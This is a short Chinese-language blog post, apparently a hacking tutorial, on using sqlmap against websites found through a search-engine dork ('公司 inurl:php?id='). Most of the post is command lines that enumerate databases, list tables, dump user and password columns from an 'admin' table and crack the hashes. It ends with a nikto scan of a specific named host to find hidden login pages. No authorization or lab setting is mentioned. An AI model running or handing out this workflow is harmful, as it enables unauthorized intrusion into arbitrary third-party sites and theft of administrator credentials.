SQLmap

作者: 慕止 | 来源:发表于2018-10-23 10:49 被阅读0次

    可以Google或者百度搜索

    公司 inurl:php?id=
    //初始注入
    sqlmap -u 链接地址 --dbs --current-user
    基本都是用字典来查找
    ![有注入漏洞](https://img.haomeiwen.com/i4391209/454c56d74d449911.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
    
    //寻找数据库的表
    sqlmap -u --dbms mysql -D 你要查找的表名 --tables
    输入10个线程
    如果找不到表名可以使用
    sqlmap -u --dbms mysql  --tables
    
    //查找指定的表(找的表如:admin)
    sqlmap -u 链接 --dbms mysql -T admin --columns
    //如找到字段有user,pwd就可以使用:
    sqlmap -u 链接 --dbms mysql -T admin -C user,pwd --dump
    

    破解哈希密码


    image.png

    选择1,使用自带字典慢慢查找。

    如果找不到登录入口,可以使用nikto来查找隐藏的目录
    nikto -host www.825.st.wsy010.cn

    例如

    相关文章

      网友评论

          本文标题:SQLmap

          本文链接:https://www.haomeiwen.com/subject/pyojtftx.html